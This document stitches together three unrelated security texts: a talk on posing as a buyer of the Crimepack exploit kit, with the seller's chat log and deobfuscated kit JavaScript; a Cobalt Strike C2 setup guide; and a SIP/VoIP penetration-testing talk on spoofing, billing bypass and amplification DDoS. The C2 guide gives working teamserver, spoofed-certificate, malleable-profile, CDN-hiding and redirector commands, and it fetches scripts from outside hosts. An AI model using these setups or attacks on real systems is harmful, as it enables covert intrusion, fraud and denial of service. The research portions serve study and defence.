AM NEW VERSION 2.8.2 AVAILABLE NOW: 2 domain rebuilds are free • 2:36:01 AM NEW VERSION 2.8.2 AVAILABLE NOW: what brought you interest in crimepack? • 2:36:02 AM Buyer: may I set it up in my personal computer to try it out first before putting it to the domain? • 2:36:17 AM Buyer: I would like to study how it works only • 2:36:21 AM NEW VERSION 2.8.2 AVAILABLE NOW: the trial will be hosted on my server • 2:37:09 AM Buyer: nice • 2:37:11 AM NEW VERSION 2.8.2 AVAILABLE NOW: the pack will then be bound to a domain so if you redirect your domain to your personal computer then you can test it there • 2:38:30 AM Buyer: thanks, mate. • 2:38:53 AM Buyer: then I would like to know how you have interest to make crimepack as well? • 2:39:08 AM NEW VERSION 2.8.2 AVAILABLE NOW: what do you think? • 2:39:12 AM Buyer: It is quite advanced indeed. • 2:39:25 AM Buyer: to make $$$ to sponsor your research indeed. • 2:40:02 AM NEW VERSION 2.8.2 AVAILABLE NOW: its all about making money • 2:40:24 AM Buyer: I also want to be have such kungfu like you guys in the future. • 2:42:26 AM NEW VERSION 2.8.2 AVAILABLE NOW: what kind of malware do you run? • 2:42:46 AM Buyer: IE exploit • 2:42:59 AM Buyer: or browser exploit. • 2:43:41 AM NEW VERSION 2.8.2 AVAILABLE NOW: so your intensions of buying the exploit is not to spread your malware? • 2:44:27 AM Buyer: i am just studying over it • 2:46:24 AM Buyer: "use it at my own risk", right? • 2:47:22 AM Buyer: Then I could try it out in an hour, couldn't I? • 2:47:36 AM Buyer: For the web money account, do you have any more details for me? • 2:51:44 AM NEW VERSION 2.8.2 AVAILABLE NOW: ? • 2:51:58 AM Buyer: how can I transfer the money to you? • 2:52:39 AM Buyer: i just used paypal in the past • 3:03:33 AM Buyer: hi there? • 3:04:04 AM Buyer: do you mind to drop me message once you have set the trial for me? • 3:04:18 AM Buyer: this is my mail <MY EMAIL ADDRESS> • 3:19:48 AM Buyer: Hello? • 3:23:03 AM NEW VERSION 2.8.2 AVAILABLE NOW: i'm not interested to sell to security researchers • 3:24:16 AM Buyer: dude, i can't disclose too much to you right now becos it is proabably installed in China. • 3:24:30 AM Buyer: our conversation is not encrypted • 3:24:46 AM Buyer: there is no guarantee anyone sniffs our traffic. • 3:25:32 AM Buyer: i could only disclose, i have been recruited to test on it before someone spread the malware. • 3:27:13 AM Buyer: The boss behind does not want a single guy to undertake the whole/entire attack/malware spreading process, that's it • 3:27:32 AM Buyer: I don't know what he targets on neither. • 3:27:51 AM Buyer: i also just make money. • 3:28:56 AM Buyer: what do you think, dude? • 3:29:49 AM NEW VERSION 2.8.2 AVAILABLE NOW: <removed admin account ID>/<removed passwd> • 3:29:51 AM NEW VERSION 2.8.2 AVAILABLE NOW: have fun • 3:29:52 AM NEW VERSION 2.8.2 AVAILABLE NOW: you got • 3:29:53 AM NEW VERSION 2.8.2 AVAILABLE NOW: 5 days • 3:29:58 AM Buyer: thanks, mate. • 3:30:08 AM Buyer: thanks for your understanding. • 3:30:25 AM NEW VERSION 2.8.2 AVAILABLE NOW: if i see any attempts of sql injection i will remove it • 3:30:44 AM Buyer: sure, no problem, i just tried out the functions and feedback to the boss behind. • 3:30:57 AM Buyer: I will be the contact point to reach you to purchase. • 3:31:02 AM NEW VERSION 2.8.2 AVAILABLE NOW: ok • 3:32:50 AM Buyer: I will have 1-2 mates from US to try out the function only. • 3:49:50 AM NEW VERSION 2.8.2 AVAILABLE NOW: you tested with firefox? • 3:50:12 AM Buyer: yeah • 3:50:19 AM Buyer: and Chorme • 3:50:43 AM NEW VERSION 2.8.2 AVAILABLE NOW: try now • 3:51:02 AM NEW VERSION 2.8.2 AVAILABLE NOW: if 'enable bad traffic' is not checked it will not allow Chrome and other browsers visit the page • 3:51:05 AM NEW VERSION 2.8.2 AVAILABLE NOW: only IE, FF, OP • 3:51:38 AM NEW VERSION 2.8.2 AVAILABLE NOW: also its because you are visiting with a Mac, it is for Windows Only • 3:52:19 AM Buyer: okay • 4:50:01 AM Buyer: hi dude • 4:50:13 AM Buyer: I have tried again in IE • 4:50:16 AM Buyer: but it faile. • 4:50:19 AM Buyer: failed • 4:50:27 AM Buyer: Not Found message is shown. • 4:54:18 AM NEW VERSION 2.8.2 AVAILABLE NOW: because you already visited it • 4:54:30 AM NEW VERSION 2.8.2 AVAILABLE NOW: if your ip is already in the database it will show a 404 next time you visit • 4:54:35 AM NEW VERSION 2.8.2 AVAILABLE NOW: clear the stats and you can visit again • 4:54:52 AM NEW VERSION 2.8.2 AVAILABLE NOW: unnessicery to have duped victims • 3:33:14 AM Buyer: do you have any readme/docs for me? • 3:39:18 AM NEW VERSION 2.8.2 AVAILABLE NOW: go to 'settings' and upload exe • 3:39:21 AM NEW VERSION 2.8.2 AVAILABLE NOW: send traffic to • 3:47:52 AM Buyer: dude • 3:47:59 AM Buyer: it is not found; • 3:48:00 AM Buyer: • 3:48:21 AM Buyer: do you have a handle for me call you? • 3:48:21 AM NEW VERSION 2.8.2 AVAILABLE NOW: what browser you visit with? • 3:48:25 AM Buyer: Firefox • 3:48:51 AM NEW VERSION 2.8.2 AVAILABLE NOW: working for me • 3:49:06 AM Buyer: Not Found • The requested URL / was not found on this server. • Main Menu Referrer Origin of countries Blacklist Check Build a Downloader Clear Statistics • Clear Stats • It allows the administrator to clear up all statistics of latest malware deployment. Setting? Mission 2: Analysis and Deobfuscation The site is ready •, • Aha, it is the seller’s server  • I have uploaded a payload, simply calc.ex – Payload characteristic – Size: 112kb (114688 bytes) – md5: 829e4805b0e12b383ee09abdc9e2dc3c Visit the site in VM Pwned • 114KB executable has been downloaded How about automated scan? • Wepaweb: FAILED How about automated scan? • Jsunpack: Yeah! • For more details and payload download, it could be found from the following URL: http://jsunpack.jeek.org/dec/go?report=f5b4 710bb96e4b9d4ea440164c2d70120299c3a3 • The password is “infected”. More conversation • 1:01:38 AM Buyer: does it support more obfuscation. • 1:01:54 AM Buyer: Wepaweb cannot analyze it. • 1:02:04 AM Buyer: however, Jsunpack could do it. • 1:02:37 AM Crimepack 3.0-Delta available: crimepack itself does not make any other obfuscation due to Kaspersky detecting most of them so i figured out a way how to not get it detected and thats how its implemented • 1:02:53 AM Crimepack 3.0-Delta available: i can take a look at jsunpack later, i've bypassed it quite a few times already • 1:04:36 AM Crimepack 3.0-Delta available: anyways im working on some improvements on the pack, ina few days i can give you another evaluation panel so you can try out the new version • 1:04:52 AM Buyer: that's nice • 1:05:38 AM Buyer: may be, you could allow us to import some exploits • 1:08:57 AM Crimepack 3.0-Delta available: yes i'm planning to add a few exploits for AIM (not the newest though) that hopefully will have some effect on US traffic, along with the Firefox 3.5 exploit, and a few activex control exploits • 1:09:34 AM Crimepack 3.0-Delta available: and i'm also thinking about creating kind of a development framework so you can include your own exploits on the fly and enable/disable them Manual” Kungfu Syntax Error? Ops, Document has no properties Declare a variable type for zelslxls instead of id name in <div> • // Original: <div id="zeslxls” style="display:none;">eS8kz…</d iv> • var zelslxls = “………”; After executing the replace function, it is document.getElementById(“zeslxls”).innerHTML, we simply put it as “zelslxls” as it is no longer an id of <div> tag. • //Original: var mzmiycr=HeJKUePIhDF(document['pndqsqp gpndqsqpepndqsqptpndqsqpEpndqsqplpndq sqpepndqsqpmpndqsqpepndqsqpnpndqsqptp ndqsqpBpndqsqpypndqsqpIpndqsqpdpndqsq p'.replace(/pndqsqp/g,'')]("zeslxls") .innerHTML); • // Deobfuscated and zeslxls is not an ID of <div> but it is defined as a variable. var mzmiycr=HeJKUePIhDF(zeslxls); Replace the executed result “search” with […] • //Original: znknvsh['wklxnerswklxnerewklxne rarwklxnerch'.replace(/wklxner/ g,'')](zdiubxv); • var mcstfpj=znknvsh.search(zdiubxv); Replace the executed result document.location.herf with any URL. • //Original: return document['wklxnerlwklxnerowklxnerc atwklxneriwklxnerowklxnern'.replac e(/wklxner/g,'')].href; • return "http://www.google.com"; Yeah! Put it more simple • We have put a document.write and alert on the variable in the following code section with for-loop: for (i=0;i<qfnynws.length;i+=2) { mbtnpoq+=oragddz(ptdbrww(qfnynws[yaunsut[vfsc kpg('vvbciksrtwlculxe','vvbcikspqioqrfjltwlcu lxa','twlculxcvvbcikse')](/AJ/g,'')](i,zexegx w),ptdeqea())); } document.write(mbtnpoq); alert(mbtnpoq); We could still get the result Mission 3: Let’s sum up Exploit-based Crimeware • Existing exploits • Bundled attack • Bypassing deobfuscation • Bypassing AV • Checking whether it is blacklisted. …. Eleonore Browser Exploit Kit http://krebsonsecurity.com/2010/01/a-peek-inside-the-eleonore-browser-exploit-kit/ GOLOD http://malwareint.blogspot.com/2010/03/ipack-y-golod-new-on-scene-crimeware.html iPack Botnet-based Exploit Kit • Spyeye – Made in Russia – Formgrabbing (an advanced keylogging method of capturing web form data) supporting Firefox, IE, Maxthon and Netscape. – CC Autofill (A module that, basically, automates the process of credit card frauds, and gives money to the owner) – PHP-MYSQL Administration Panel – Daily backup of the database via e-mail – Exe String-Sources encryption – FTP Grabbing (Total Commander, Notepad++, FileZilla, and others) – POP3 Grabbing – Invisible in processes list, hidden file, invisible in autorun (registry) From:http://malwareint.blogspot.com/2010/01/spyeye-new-bot-on-market.html Final Weapon: 0-Day Browser Exploit Kit • Impassion Framework – I try to get an trial account but failed. – Provide 0-day exploits in IE and PDF monthly update. – They claim they have the largest market share! – 1400 EUROS/month! – Features: http://malwareview.com/index.php?topic=712.0 – Watch the video from here: • http://www.youtube.com/watch?v=F4J3SeFkzXg Hmmm… • Exploit kit could automate the threat propagation • You simply pay it and use it, it is user friendly. • Easy to keep track of the infection • Allow deploy your own exploit • Law and rule has never made it clear whether crimeware is illegal or not. Bonus stage  Mission 4: Exploit the crimeware Google hacking or Search Malware List • http://www.malwaredomainlist.com/mdl.php ?search=pack&colsearch=All&quantity=50 • http://www.malwaredomainlist.com/mdl.php ?search=kit&colsearch=All&quantity=50 Scan over them! • NMAP • Free web tools • SQL injection • Directory traversal Hack them?! • Hack them down…(hahaha, own them for justice?! Dude, unless your police force allows you to do it) “All that is necessary for the triumph of evil is that good men do nothing.” - Edmund Burkle Thank you for listening • You could reach me for the slide and a short paper about it at darkfloyd@vxrl.org
CobaltStrike 0x00 C2 @L.N TeamServerCS TeamServer CobaltStrike 4.3 DoS C2 0x01 + 1. teamserver 50050 java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=55555 -Dcobaltstrike.ser ver_bindto= -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl .keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpa th cobaltstrike.jar -Duser.language=en -javaagent:CSAgent.jar=3a4425490f389aeec3 12bdd758ad2b99 server.TeamServer $* 2. # Outlook keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Outlook.live.com, OU=Microsoft Corporation # 360 keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey - keyalg RSA -alias 360.com -dname "CN=US, OU=360.com, O=Sofaware, L=Somewhere, ST =Cyberspace, C=CN" # baidu keytool -keystore cobaltStrike.store -storepass 123456 -keypass 123456 -genkey - keyalg RSA -alias baidu.com -dname "CN=ZhongGuo, OU=CC, O=CCSEC, L=BeiJing, ST=C haoYang, C=CN" # keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstri ke.store -deststoretype pkcs12 PS: 3. HTTPS 3.1 Let's Encrypt HTTPsC2DoneRight.sh HTTPS @ func_install_letsencrypt func_install_letsencrypt(){ echo '[Starting] cloning into letsencrypt!' # git clone https://github.com/certbot/certbot /opt/letsencrypt echo '[Success] letsencrypt is built!' # cd /opt/letsencrypt echo '[Starting] to build letsencrypt cert!' certbot --apache -d $domain -n --register-unsafely-without-email --agree-tos if [ -e /etc/letsencrypt/live/$domain/fullchain.pem ]; then echo '[Success] letsencrypt certs are built!' else echo "[ERROR] letsencrypt certs failed to build. Check that DNS A recor d is properly configured f exit 1 fi } sudo apt install -y git lsof snap sudo snap install core; sudo snap refresh core sudo apt remove certbot sudo snap install certbot sudo ln -s /snap/bin/certbot /usr/bin/certbot wget https://raw.githubusercontent.com/killswitch-GUI/CobaltStrike-ToolKit/maste r/HTTPsC2DoneRight.sh && chmod +x HTTPsC2DoneRight.sh amazon.profile domain.store amazon.profile teamserver cobaltstrike.store domain.store 3.2 cloudflare pemkey.pemchain.pem cobaltstrike 1. domain.store openssl pkcs12 -export -in /api.domain.com/chain.pem -inkey /api.xxx.com/key.pem -out api.domain.com.p12 -name api.domain.com -passout pass:123456 keytool -importkeystore -deststorepass 123456 -destkeypass 123456 -destkeystore api.domain.com -srckeystore api.domain.com.p12 -srcstoretype PKCS12 -srcstorepas s 123456 -alias api.domain.com 2. teamserver cobaltstrike.store api.domain.com.store 3. c2.profile https https-certificate { set keystore "api.domain.com.store"; set password "123456"; } 3.3 "zerossl" "letsencrypt" "buypass" "sslcom" 1. https://secure.ssl.com/users/new 2. acme.sh # RSA acme.sh --register-account --server sslcom -m scotthelme@hotmail.com --eab-kid 7 a7xxxxxx7e1 --eab-hmac-key h # ECC acme.sh --register-account --server sslcom -m scotthelme@hotmail.com --eab-kid 7 a7xxxxxx7e1 --eab-hmac-key hEAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxGzs --ecc # sslcom acme.sh --issue --dns dns_cf -d sslcom-demo.scotthelme.co.uk --force --keylength ec-256 --server sslcom #!/bin/bash #!/bin/bash set -e SERVERS=("zerossl" "letsencrypt" "buypass" "sslcom") /home/scott/acme.sh/acme.sh --issue --dns dns_cf -d homeassistant.scotthelme.co. uk --force --keylength ec-256 --server $(shuf -n1 -e "${SERVERS[@]}") 3.2 0x02 C2 Profiles 1. github C2 Profile Awesome-CobaltStrikeC2 Profile malleable-c2 jquery-c2.4.3.profilejquery 2. Malleable-C2-Randomizer 4 C2 Profile 4.3/4.4) python malleable-c2-randomizer.py -profile Sample\ Templates/pandora.profile -no test payload spawn post-ex spawn mstsc.exe post-ex { set spawnto_x86 "%windir%\\syswow64\\mstsc.exe"; set spawnto_x64 "%windir%\\sysnative\\mstsc.exe"; } PS: @ CloudFront Cobalt Strike C2 Profile () 3. random_c2_profile cs4.4 python random_c2profile.py https 4. SourcePoint yaml 5. C2 v1.0 () link: https://www.red-team.cn/index.php?tools 0x03 CobaltStrike Stage URI Beacon Staging ServerPayload payloadstagerpayloadBeacon staging server stagestageURLchecksum8 c2 profilehttp-stagestage beacon (false)checksum8 1. iptables IPlistener # 47.xx.xx.xx443 iptables -I INPUT -p tcp --dport 443 -j DROP iptables -I INPUT -s 47.xx.xx.xx -ptcp --dport 443 -j ACCEPT listener HTTPS Port(bind) target stager iptables -A INPUT -s -p tcp --dport 4443 -j ACCEPT iptables -A INPUT -p tcp --dport 4443 -j DROP iptablesiptablse-save iptables-save > /etc/iptables.rules /etc/network/interfaces pre-up iptables-restore < /etc/iptables.rules 2. stagerkillrestart listener 3. cobaltstrike cs 3.x0x69cs 4.x0x2e PS: CobaltStrike 0x04 CDN + CDN teamserver cloudflare cloudflare HTTPS fullchain.pem , privkey.pem DNS 3() (*.jsprofileurijs ) HTTPScobaltstrike *.store amazon.profile https-certificate profile #!/bin/bash #!/bin/bash # Global Variables runuser=$(whoami) tempdir=$(pwd) # Echo Title clear echo '========================================================================== ' echo ' HTTPS C2 Done Right Setup Script For CloudFlare | [Updated]: 2021 ' echo '========================================================================== ' echo -n "Enter your DNS (A) record for domain [ENTER]: " read domain echo echo -n "Enter your common password to be used [ENTER]: " read password echo echo -n "Enter your CobaltStrike server file path [ENTER]: " read cobaltStrike echo domainPkcs="$domain.p12" domainStore="$domain.store" cobaltStrikeProfilePath="$cobaltStrike/httpsProfile" # Environment Checks func_check_env(){ # Check Sudo Dependency going to need that! if [ $(id -u) -ne '0' ]; then echo echo ' [ERROR]: This Setup Script Requires root privileges!' echo ' Please run this setup script again with sudo or run as login as root.' echo exit 1 fi } func_check_tools(){ # Check Sudo Dependency going to need that! if [ $(which keytool) ]; then echo '[Sweet] java keytool is installed' else echo echo ' [ERROR]: keytool does not seem to be installed' echo exit 1 fi if [ $(which openssl) ]; then echo '[Sweet] openssl keytool is installed' else echo echo ' [ERROR]: openssl does not seem to be installed' echo exit 1 fi if [ $(which git) ]; then echo '[Sweet] git keytool is installed' else echo echo ' [ERROR]: git does not seem to be installed' echo exit 1 fi } func_build_pkcs(){ cd /etc/letsencrypt/live/$domain echo '[Starting] Building PKCS12 .p12 cert.' openssl pkcs12 -export -in fullchain.pem -inkey privkey.pem -out $domainPkcs - name $domain -passout pass:$password echo '[Success] Built $domainPkcs PKCS12 cert.' echo '[Starting] Building Java keystore via keytool.' keytool -importkeystore -deststorepass $password -destkeypass $password -destk eystore $domainStore -srckeystore $domainPkcs -srcstoretype PKCS12 -srcstorepass $password -alias $domain echo '[Success] Java keystore $domainStore built.' mkdir $cobaltStrikeProfilePath cp $domainStore $cobaltStrikeProfilePath echo '[Success] Moved Java keystore to CS profile Folder.' } func_build_c2(){ cd $cobaltStrikeProfilePath echo '[Starting] Cloning into amazon.profile for testing.' wget https://raw.githubusercontent.com/rsmudge/Malleable-C2-Profiles/master/no rmal/amazon.profile --no-check-certificate -O amazon.profile echo '[Success] amazon.profile clonned.' echo '[Starting] Adding java keystore / password to amazon.profile.' echo " " >> amazon.profile echo 'https-certificate {' >> amazon.profile echo set keystore \"$domainStore\"\; >> amazon.profile echo set password \"$password\"\; >> amazon.profile echo '}' >> amazon.profile echo '[Success] amazon.profile updated with HTTPs settings.' } # Menu Case Statement case $1 in *) func_check_env func_check_tools func_build_pkcs func_build_c2 ;; esac profile ./teamserver 123456 amazon.profile listener cloudflare cdn #!/bin/bash # IPv4HTTP/S iptables -I INPUT -p tcp –dport 80 -j DROP iptables -I INPUT -p tcp –dport 443 -j DROP # Cloudflare CDN IPv4HTTP/S for i in `curl https://www.cloudflare.com/ips-v4`; do iptables -I INPUT -s $i -p tcp –dport 80 -j ACCEPT; done for i in `curl https://www.cloudflare.com/ips-v4`; do iptables -I INPUT -s $i -p tcp –dport 443 -j ACCEPT; done # IPv6HTTP/S ip6tables -I INPUT -p tcp –dport 80 -j DROP ip6tables -I INPUT -p tcp –dport 443 -j DROP # Cloudflare CDN IPv6HTTP/S for i in `curl https://www.cloudflare.com/ips-v6`; do ip6tables -I INPUT -s $i - p tcp –dport 80 -j ACCEPT; done for i in `curl https://www.cloudflare.com/ips-v6`; do ip6tables -I INPUT -s $i - p tcp –dport 443 -j ACCEPT; done # iptables iptables-save ip6tables-save Cloudflare HTTP 80,8080,8880,2052,2082,2086,2095 HTTPS 443,2053,2083,2087,2096,8443 teamserver (: 54321)iptables localhost (: 54321)VPN(: OPENVPN) teamserver VPN 0x05 server JA3/S & JARM teamserver C2 : teamserver proxy server target 1. listener sudo apt install socat socat TCP4-LISTEN:80,fork TCP4: & socat TCP4-LISTEN:443,fork TCP4: & ... # netstat -pantu | grep socat kill PID listenerIP 2. apache/nginx : 1. https://kosakd.top/2021/05/05/CobaltStrike%E6%95%99%E7%A8%8B/ 2. 3. RedWarden RedWardenCobalt Strike C2 CobaltStrikeMalleable EDR RedWardenHTTP/HTTPSC2 HTTP TeamserverApache2mod_rewrite .htaccess RedWardenC2IR/AV/EDRs/ Apache2+mod_rewrite TCP / 0x01 pem mkdir -p ~/ssl/demoCA/{certs,newcerts,crl,private} cd ~/ssl/demoCA touch index.txt echo "01" > serial sudo cp /etc/ssl/openssl.cnf ~/ssl/openssl.cnf vi ~/ssl/openssl.cnf cd ~/ssl/ openssl req -new -x509 -newkey rsa:4096 -keyout cakey.key -out cacert.crt -confi g openssl.cnf -days 365 # openssl rsa -noout -text -in cakey.key # openssl x509 -noout -text -in cacert.crt RedWarden # # SSL certificate CAcert (pem, crt, cert) and private key CAkey # ssl_cacert: /home/kali/ssl/cacert.crt ssl_cakey: /home/kali/ssl/cakey.key profile https://www.red- team.cn/index.php?tools profile: test.profile port: - 8443/https teamservercobaltstrikelistener teamserver_url: - drop_action: redirect action_url: - https://outlook.live.com/ outlookprofile outlookoutlook artfact
VoIP Wars : Return of the SIP Fatih Özavcı Information Security Researcher & Consultant fatih.ozavci at viproy.com viproy.com/fozavci 2 # whois ● Information Security Consultant @ Viproy / Turkey ● 10+ Years Experience in Penetration Testing ● 800+ Penetration Tests, 40+ Focused on NGN/VoIP – SIP/NGN/VoIP Systems Penetration Testing – Mobile Application Penetration Testing – IPTV Penetration Testing – Regular Stuff (Network Inf., Web, SOAP, Exploitation...) ● Author of Viproy VoIP Penetration Testing Kit ● Author of Hacking Trust Relationships Between SIP Gateways ● Blackhat Arsenal USA 2013 – Viproy VoIP Pen-Test Kit ● So, that's me 3 # traceroute ● VoIP Networks are Insecure, but Why? ● Basic Attacks but in Easy Way – Discovery, Footprinting, Brute Force – Initiating a Call, Spoofing, CDR and Billing Bypass ● SIP Proxy Bounce Attack ● Fake Services and MITM – Fuzzing Servers and Clients, Collecting Credentials ● (Distributed) Denial of Service – Attacking SIP Soft Switches and SIP Clients, SIP Amplication Attack ● Hacking Trust Relationships of SIP Gateways ● Attacking SIP Clients via SIP Trust Relationships ● Fuzzing in Advance ● Out of Scope – RTP Services and Network Tests, Management – Additional Services – XML/JSON Based Soap Services 4 # info ● SIP – Session Initiation Protocol – Only Signaling, not for Call Transporting – Extended with Session Discovery Protocol ● NGN – Next Generation Network – Forget TDM and PSTN – SIP, H.248 / Megaco, RTP, MSAN/MGW – Smart Customer Modems & Phones – Easy Management – Security is NOT a Concern?! ● Next Generation! Because We Said So! 5 # Administrators Think... Root Doesn't! ● Their VoIP Network Isolated – Open Physical Access, Weak VPN or MPLS ● Abusing VoIP Requires Knowledge – It's Easy with Automated Tools, But That's the Case ! ● Most Attacks are Network Based or Toll Fraud – DOS, DDOS, Attacking Mobile Clients, Spying – Phishing, Surveliance, Abusing VAS Services ● VoIP Devices are Well-Configured – Weak Passwords, Old Software, Vulnerable Protocols 6 # SIP Services : Internal IP Telephony INTERNET SIP Server Support Servers SIP Clients Factory/Campus SIP over VPN Commercial Gateways Analog/Digital PBX 7 # SIP Services : Commercial Services INTERNET Soft Switch (SIP Server) VAS, CDR, DB Servers MSAN/MGW PSTN/ISDN Distributed MPLS 3rd Party Gateways SDP Servers Customers RTP, Proxy Servers Mobile 8 # Viproy What? ● Viproy is a Vulcan-ish Word that means "Call" ● Viproy VoIP Penetration and Exploitation Kit – Testing Modules for Metasploit, MSF License – Old Techniques, New Approach – SIP Library for New Module Development – Custom Header Support, Authentication Support – New Stuffs for Testing: Trust Analyzer, Proxy etc ● Modules – Options, Register, Invite – Brute Forcers, Enumerator – SIP Trust Analyzer, Service Scanner – SIP Proxy, Fake Service, DDOS Tester 9 # Basic Attacks but in Easy Way ● We are looking for... – Finding and Identifying SIP Services and Purposes – Discovering Available Methods and Features – Discovering SIP Software and Vulnerabilities – Identifying Valid Target Numbers, Users, Realm – Unauthenticated Registration (Trunk, VAS, Gateway) – Brute Forcing Valid Accounts and Passwords – Invite Without Registration – Direct Invite from Special Trunk (IP Based) – Invite Spoofing (After or Before Registration, Via Trunk) ● Viproy Pen-Testing Kit Could Automate Discovery 10 # Basic Attacks but in Easy Way Discovery OPTIONS / REGISTER / INVITE / SUBSCRIBE 100 Trying 200 OK 401 Unauthorized 403 Forbidden 404 Not Found 500 Internal Server Error Collecting Information from Response Headers ➔ User-Agent ➔ Server ➔ Realm ➔ Call-ID ➔ Record-Route ➔ ➔ Warning ➔ P-Asserted-Identity ➔ P-Called-Party-ID ➔ P-Preferred-Identity ➔ P-Charging-Vector Soft Switch (SIP Server) Clients Gateways 11 # Basic Attacks but in Easy Way Register REGISTER / SUBSCRIBE (From, To, Credentials) 200 OK 401 Unauthorized 403 Forbidden 404 Not Found 500 Internal Server Error RESPONSE Depends on Informations in REQUEST ➔ Type of Request (REGISTER, SUBSCRIBE) ➔ FROM, TO, Credentials with Realm ➔ Via Actions/Tests Depends on RESPONSE ➔ Brute Force (FROM, TO, Credentials) ➔ Detecting/Enumerating Special TOs, FROMs or Trunks ➔ Detecting/Enumerating Accounts With Weak or Null Passwords ➔ …. Soft Switch (SIP Server) Clients Gateways 12 # Basic Attacks but in Easy Way ● this isn't the call you're looking for ● We are attacking for... – Free Calling, Call Spoofing – Free VAS Services, Free International Calling – Breaking Call Barriers – Spoofing with... ● Via Field, From Field ● P-Asserted-Identity, P-Called-Party-ID, P-Preferred-Identity ● ISDN Calling Party Number, Remote-Party-ID – Bypass with... ● P-Charging-Vector (Spoofing, Manipulating) ● Re-Invite, Update (Without/With P-Charging-Vector) ● Viproy Pen-Testing Kit Supports Custom Headers 13 # Basic Attacks but in Easy Way Invite, CDR and Billing Tests Soft Switch (SIP Server) Clients Gateways INVITE/ACK/RE-INVITE/UPDATE (From, To, Credentials, VIA ...) 401 Unauthorized 403 Forbidden 404 Not Found 500 Internal Server Error Actions/Tests Depends on RESPONSE ➔ Brute Force (FROM&TO) for VAS and Gateways ➔ Testing Call Limits, Unauthenticated Calls, CDR Management ➔ INVITE Spoofing for Restriction Bypass, Spying, Invoice ➔ …. 100 Trying 183 Session Progress 180 Ringing 200 OK RESPONSE Depends on Informations in INVITE REQUEST ➔ FROM, TO, Credentials with Realm, FROM <>, TO <> ➔ Via, Record-Route ➔ Direct INVITE from Specific IP:PORT (IP Based Trunks) 14 # SIP Proxy Bounce Attack ● SIP Proxies Redirect Requests to Other SIP Servers – We Can Access Them via SIP Proxy then We Can Scan – We Can Scan Inaccessible Servers – URI Field is Useful for This Scan ● Viproy Pen-Testing Kit Has a UDP Port Scan Module 15 # SIP Proxy Bounce Attack The Wall – Izmir Production SIP Service Ankara White Walker Adana How Can We Use It? ● SIP Trust Relationship Attacks ● Attacking Inaccessible Servers ● Attacking SIP Software – Software Version, Type 16 # Fake Services and MITM Usage of Proxy & Fake Server Features Soft Switch (SIP Server) ● Use ARP Spoof & VLAN Hopping & Manual Config ● Collect Credentials, Hashes, Information ● Change Client's Request to Add a Feature (Spoofing etc) ● Change the SDP Features to Redirect Calls ● Add a Proxy Header to Bypass Billing & CDR ● Manipulate Request at Runtime to find BOF Vulnerabilities Clients 17 # Fake Services and MITM ● We Need a Fake Service – Adding a Feature to Regular SIP Client – Collecting Credentials – Redirecting Calls – Manipulating CDR or Billing Features – Fuzzing Servers and Clients for Vulnerabilities ● Fake Service Should be Semi-Automated – Communiation Sequence Should be Defined – Sending Bogus Request/Result to Client/Server ● Viproy Pen-Testing Kit Has a SIP Proxy and Fake Service ● Fuzzing Support of Fake Service is in Development Stage 18 # DOS – It's Not Service, It's Money ● Locking All Customer Phones and Services for Blackmail ● Denial of Service Vulnerabilities of SIP Services – Many Responses for Bogus Requests → DDOS – Concurrent Registered User/Call Limits – Voice Message Box, CDR, VAS based DOS Attacks – Bye And Cancel Tests for Call Drop – Locking All Accounts if Account Locking is Active for Multiple Fails ● Multiple Invite (After or Before Registration, Via Trunk) – Calling All Numbers at Same Time – Overloading SIP Server's Call Limits – Calling Expensive Gateways,Targets or VAS From Customers ● Viproy Pen-Testing Kit Has a few DOS Features 19 # DDOS – All Your SIP Gateways Belong to Us ! ● SIP Amplification Attack + SIP Servers Send Errors Many Times (10+) + We Can Send IP Spoofed Packets + SIP Servers Send Responses to Victim => 1 packet for 10+ Packets, ICMP Errors (Bonus) ● Viproy Pen-Testing Kit Has a PoC DDOS Module ● Can we use SIP Server's Trust ? -wait for it- 20 # DDOS – All Your SIP Gateways Belong to Us! The Wall – Izmir Production SIP Service – Ankara Production SIP Service Citadel IP Spoofed Call Request White Walker The Wall – Adana Production SIP Service 21 # Hacking SIP Trust Relationships ● NGN SIP Services Trust Each Other – Authentication and TCP are Slow, They Need Speed – IP and Port Based Trust are Most Effective Way ● What We Need – Target Number to Call (Cell Phone if Service is Public) – Tech Magazine, Web Site Information, News ● Baby Steps – Finding Trusted SIP Networks (Mostly B Class) – Sending IP Spoofed Requests from Each IP:Port – Each Call Should Contain IP:Port in From Section – If We Have a Call, We Have The Trusted SIP Gateway IP and Port – Brace Yourselves The Call is Coming 22 The Wall # Hacking SIP Trust Relationships Slow Motion – Izmir Production SIP Service Ankara Istanbul International Trusted Operator IP Spoofed Call Request Contains IP:Port Data in From White Walker 23 # Hacking SIP Trust Relationships Brace Yourselves, The Call is Coming – Izmir Production SIP Service White Walker Ankara Istanbul International Trusted Operator IP Spoofed Call Request Somebody Known in From Come Again? ● Billing ? ● CDR ? ● Log ? From Citadel The Wall 24 # Hacking SIP Trust Relationships – Business Impact ● Denial of Service – Short Message Service and Billing – Calling All Numbers at Same Time – Overloading SIP Server's Call Limits – Overloading VAS Service or International Limits – Overloading CDR Records with Spoofed Calls ● Attacking a Server Software – Crashing/Exploiting Inaccesible Features – Call Redirection (working on it, not yet :/) ● Attacking a Client? – Next Slide! 25 # Attacking a Client via SIP Trust Relationships ● SIP Server Redirects a few Fields to Client – FROM, FROM NAME, Contact – Other Fields Depend on Server (SDP, MIME etc) ● Clients Have Buffer Overflow in FROM? – Send 2000 Chars to Test it ! – Crash it or Execute your Command if Available ● Clients Trust SIP Servers and Trust is UDP Based – This module can be used for Trust Between Client and Server ● Viproy Pen-Testing Kit SIP Trust Module – Simple Fuzz Support (FROM=FUZZ 2000) – You Can Modify it for Further Attacks 26 # Attacking a Client via SIP Trust Relationships Brace Yourselves 550 Chars are Coming – Izmir Production SIP Service White Walker Ankara Istanbul International Trusted Operator IP Spoofed Call Request 550 Chars in From CRASSSSH! ● Command? ● Why Not! Bogus Invite Request The Wall The Wall AdorePhone Iphone App 27 # Fuzz Me Maybe ● Fuzzing as a SIP Client | SIP Server | Proxy | MITM ● SIP Server Software ● SIP Clients – Hardware Devices, IP Phones, Video Conference Systems – Desktop Application or Web Based Software – Mobile 